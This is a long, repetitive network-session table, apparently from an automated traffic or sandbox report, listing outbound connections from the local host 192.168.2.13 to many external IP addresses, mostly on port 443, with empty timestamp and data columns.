                                        21260192.168.2.1359930184.29.161.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21261192.168.2.1336472176.17.244.168443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21262192.168.2.133332654.30.153.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21263192.168.2.1356464175.217.169.185443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21264192.168.2.1347468156.134.239.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21265192.168.2.1335798204.224.69.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21266192.168.2.133692620.168.138.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21267192.168.2.1356440178.211.60.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21268192.168.2.133972612.21.128.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21269192.168.2.1356292172.110.27.129443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21270192.168.2.1359356124.47.220.23443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21271192.168.2.135223246.248.201.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21272192.168.2.135076644.100.121.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21273192.168.2.135294425.158.132.51443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21274192.168.2.133765696.238.89.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21275192.168.2.1359588197.207.167.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21276192.168.2.1356552123.189.104.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21277192.168.2.1338918195.70.190.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21278192.168.2.1347126130.165.210.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21279192.168.2.134604864.230.112.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21280192.168.2.135530665.44.1.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21281192.168.2.13532769.50.189.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21282192.168.2.1357590217.48.103.53443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21283192.168.2.1334150195.42.9.50443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21284192.168.2.135364641.167.112.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21285192.168.2.133886284.116.117.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21286192.168.2.135737483.164.86.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21287192.168.2.135185436.55.0.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21288192.168.2.1358470221.252.90.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21289192.168.2.133723032.68.213.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21290192.168.2.1358548138.116.131.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21291192.168.2.135638052.183.223.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21292192.168.2.1343294160.183.176.85443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21293192.168.2.1357310131.93.204.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21294192.168.2.133996896.163.236.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21295192.168.2.133478847.121.71.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21296192.168.2.1354028113.158.11.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21297192.168.2.1349494117.53.89.31443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21298192.168.2.135866458.101.180.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21299192.168.2.133434819.64.56.248443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21300192.168.2.1342034103.160.107.199443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21301192.168.2.135127296.188.163.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21302192.168.2.1354238135.248.174.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21303192.168.2.133521876.176.44.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21304192.168.2.133498674.229.241.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21305192.168.2.1341364153.24.61.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21306192.168.2.135667692.215.176.6443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21307192.168.2.1359348194.199.104.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21308192.168.2.1356908106.50.194.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21309192.168.2.1355928137.127.30.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21310192.168.2.1337300190.85.149.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21311192.168.2.134739289.240.217.195443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21312192.168.2.1341264191.27.214.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21313192.168.2.135682041.64.231.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21314192.168.2.1353964210.18.154.150443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21315192.168.2.133560065.67.183.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21316192.168.2.1349314153.94.185.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21317192.168.2.1354756216.214.68.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21318192.168.2.1354692155.44.133.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21319192.168.2.1335600102.144.39.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21320192.168.2.1356250158.162.182.78443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21321192.168.2.133769027.232.73.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21322192.168.2.134960495.149.94.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21323192.168.2.133601288.243.10.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21324192.168.2.135835698.194.128.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21325192.168.2.133836894.105.235.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21326192.168.2.135433297.141.229.26443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21327192.168.2.133642089.139.107.191443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21328192.168.2.1356922149.87.210.123443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21329192.168.2.1342950155.0.153.44443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21330192.168.2.1349402188.158.177.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21331192.168.2.1351804141.12.62.15443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21332192.168.2.134207035.77.230.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21333192.168.2.134321050.166.79.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21334192.168.2.1333174106.5.56.29443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21335192.168.2.1359898222.149.154.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21336192.168.2.134776420.57.74.170443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21337192.168.2.135306873.28.7.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21338192.168.2.1338568197.228.194.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21339192.168.2.1356920138.77.67.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21340192.168.2.1359074223.254.177.101443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21341192.168.2.133371452.152.127.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21342192.168.2.134193041.62.224.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21343192.168.2.1358308160.147.24.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21344192.168.2.1350704184.69.145.27443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21345192.168.2.1342110104.208.202.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21346192.168.2.134275648.65.133.36443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21347192.168.2.134733448.175.138.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21348192.168.2.134326297.64.75.39443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21349192.168.2.1350070165.235.148.176443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21350192.168.2.1349840118.151.87.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21351192.168.2.133288266.198.207.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21352192.168.2.1354288106.190.41.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21353192.168.2.1344602105.37.211.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21354192.168.2.1341990147.105.137.98443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21355192.168.2.1341666128.15.126.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21356192.168.2.1359668213.37.150.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21357192.168.2.135817691.254.235.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21358192.168.2.135519436.47.203.81443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21359192.168.2.1357270203.212.61.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21360192.168.2.13506721.31.19.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21361192.168.2.1347942193.238.54.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21362192.168.2.134708414.126.184.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21363192.168.2.13547709.146.84.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21364192.168.2.1357180193.88.53.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21365192.168.2.133851838.22.190.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21366192.168.2.1350152164.106.229.244443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21367192.168.2.1352078196.148.128.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21368192.168.2.1360032126.252.173.92443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21369192.168.2.1335404143.97.22.13443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21370192.168.2.1344434197.232.144.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21371192.168.2.133761097.245.197.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21372192.168.2.133763217.235.51.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21373192.168.2.1356796155.139.177.196443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21374192.168.2.1353582194.110.80.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21375192.168.2.1359124103.18.239.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21376192.168.2.135148883.116.133.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21377192.168.2.134813473.13.233.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21378192.168.2.136064035.187.44.34443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21379192.168.2.133391218.139.82.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21380192.168.2.1359248185.144.99.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21381192.168.2.133494887.50.131.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21382192.168.2.1337222196.43.110.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21383192.168.2.1341828209.47.120.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21384192.168.2.1351938216.204.133.132443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21385192.168.2.1337340134.158.34.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21386192.168.2.1359626204.133.255.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21387192.168.2.1335596213.7.121.211443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21388192.168.2.1345552144.164.84.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21389192.168.2.1338338111.47.22.207443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21390192.168.2.1351106197.105.73.239443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21391192.168.2.134128473.87.191.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21392192.168.2.1355108200.127.1.1298080
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21393192.168.2.1342424158.0.233.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21394192.168.2.1337762126.13.19.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21395192.168.2.1358128116.114.217.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21396192.168.2.1335992156.81.158.245443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21397192.168.2.1358772211.2.128.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21398192.168.2.1356154117.94.195.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21399192.168.2.1358804174.195.112.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21400192.168.2.1353706112.221.201.116443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21401192.168.2.1337122178.183.121.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21402192.168.2.13570089.251.24.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21403192.168.2.135861625.250.157.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21404192.168.2.1360524158.78.237.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21405192.168.2.133980059.200.64.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21406192.168.2.134405481.130.27.7443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21407192.168.2.135032434.96.4.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21408192.168.2.13444722.7.100.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21409192.168.2.1355066144.232.219.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21410192.168.2.133790887.13.154.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21411192.168.2.135703272.93.12.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21412192.168.2.1341934117.66.139.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21413192.168.2.1337374155.105.113.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21414192.168.2.133458897.137.252.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21415192.168.2.1350250155.170.227.252443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21416192.168.2.134962245.26.138.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21417192.168.2.13593064.33.119.8443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21418192.168.2.1358080218.162.35.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21419192.168.2.135788837.43.56.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21420192.168.2.135368423.56.59.165443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21421192.168.2.13598902.253.70.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21422192.168.2.1347826115.247.159.117443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21423192.168.2.1343224102.51.109.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21424192.168.2.1357856191.162.120.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21425192.168.2.1342448160.181.231.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21426192.168.2.1346926124.237.62.113443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21427192.168.2.13338725.14.136.153443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21428192.168.2.1360178115.41.55.86443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21429192.168.2.1354156205.94.80.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21430192.168.2.1333176118.150.102.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21431192.168.2.134783432.112.249.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21432192.168.2.1340636136.184.202.186443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21433192.168.2.134560650.49.111.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21434192.168.2.135412037.55.176.175443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21435192.168.2.1357930171.175.95.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21436192.168.2.133423897.149.13.234443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21437192.168.2.1345952130.225.215.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21438192.168.2.1345120167.210.84.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21439192.168.2.1342594191.2.63.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21440192.168.2.135710087.98.93.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21441192.168.2.134403461.197.162.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21442192.168.2.135056698.126.128.229443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21443192.168.2.1356652125.154.114.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21444192.168.2.133574254.97.12.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21445192.168.2.133834269.17.225.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21446192.168.2.1343944102.233.125.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21447192.168.2.1333344218.118.89.235443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21448192.168.2.1335830190.231.194.74443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21449192.168.2.1360446212.17.159.159443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21450192.168.2.134715659.6.40.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21451192.168.2.1349420141.29.92.37443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21452192.168.2.1335346135.72.101.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21453192.168.2.1332942208.108.248.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21454192.168.2.1355112131.114.201.82443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21455192.168.2.1357596153.108.49.247443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21456192.168.2.134927683.52.57.166443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21457192.168.2.1337134179.52.214.240443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21458192.168.2.134555884.106.170.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21459192.168.2.133482231.164.205.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21460192.168.2.133633632.193.239.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21461192.168.2.1346992134.218.227.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21462192.168.2.13598301.202.5.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21463192.168.2.1359436164.135.48.174443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21464192.168.2.1335902177.152.89.133443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21465192.168.2.1334116173.110.147.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21466192.168.2.1342700206.52.185.62443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21467192.168.2.1357314167.166.74.68443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21468192.168.2.133707812.241.62.83443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21469192.168.2.1360874133.79.102.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21470192.168.2.1359446124.18.67.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21471192.168.2.133315024.215.146.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21472192.168.2.1342118182.31.207.109443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21473192.168.2.1334466106.91.73.250443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21474192.168.2.1355156175.183.79.112443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21475192.168.2.1360828142.26.132.22443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21476192.168.2.135728470.200.111.48443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21477192.168.2.1349120138.200.26.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21478192.168.2.1345608184.71.207.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21479192.168.2.134697876.84.200.11443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21480192.168.2.135185899.51.19.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        21481192.168.2.133322451.135.137.243443
                                        TimestampBytes transferredDirectionData


